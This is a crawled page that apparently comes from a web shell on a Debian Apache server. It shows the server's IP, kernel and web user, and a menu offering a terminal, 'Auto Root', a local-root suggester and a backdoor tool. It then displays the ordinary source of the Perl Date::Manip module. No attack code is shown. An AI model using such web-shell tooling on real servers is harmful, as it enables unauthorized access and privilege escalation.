Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
perl5 /
Date /
Delete
Unzip
Name
Size
Permission
Date
Action
Language
[ DIR ]
drwxr-xr-x
2020-08-24 23:47
Manip
[ DIR ]
drwxr-xr-x
2023-03-10 11:53
Format.pm
9.42
KB
-rw-r--r--
2009-12-12 13:30
Language.pm
2.6
KB
-rw-r--r--
2010-12-15 01:14
Manip.pm
1.22
KB
-rw-r--r--
2016-09-09 22:01
Manip.pod
12.71
KB
-rw-r--r--
2016-03-02 17:12
Parse.pm
8.74
KB
-rw-r--r--
2020-01-26 22:13
Save
Rename
package Date::Manip; # Copyright (c) 2010-2016 Sullivan Beck. All rights reserved. # This program is free software; you can redistribute it and/or modify it # under the same terms as Perl itself. ########################################################################### ########################################################################### use warnings; use strict; use Exporter; our $VERSION; $VERSION='6.57'; our (@ISA,@EXPORT); my $backend; if ((exists $ENV{'DATE_MANIP'} && $ENV{'DATE_MANIP'} eq 'DM5') || (defined $Date::Manip::Backend && $Date::Manip::Backend eq 'DM5')) { $backend = 'Date::Manip::DM5'; } elsif ($] >= 5.010) { $backend = 'Date::Manip::DM6'; } else { $backend = 'Date::Manip::DM5'; } my $backend_exp = $backend . "::EXPORT"; my $flag = eval "require $backend; $backend->import(); return 'loaded';"; if (! $flag) { die "ERROR LOADING MODULE: $backend"; } { no strict 'refs'; @EXPORT = @{ $backend_exp }; } unshift (@ISA, $backend); 1; # Local Variables: # mode: cperl # indent-tabs-mode: nil # cperl-indent-level: 3 # cperl-continued-statement-offset: 2 # cperl-continued-brace-offset: 0 # cperl-brace-offset: 0 # cperl-brace-imaginary-offset: 0 # cperl-label-offset: 0 # End: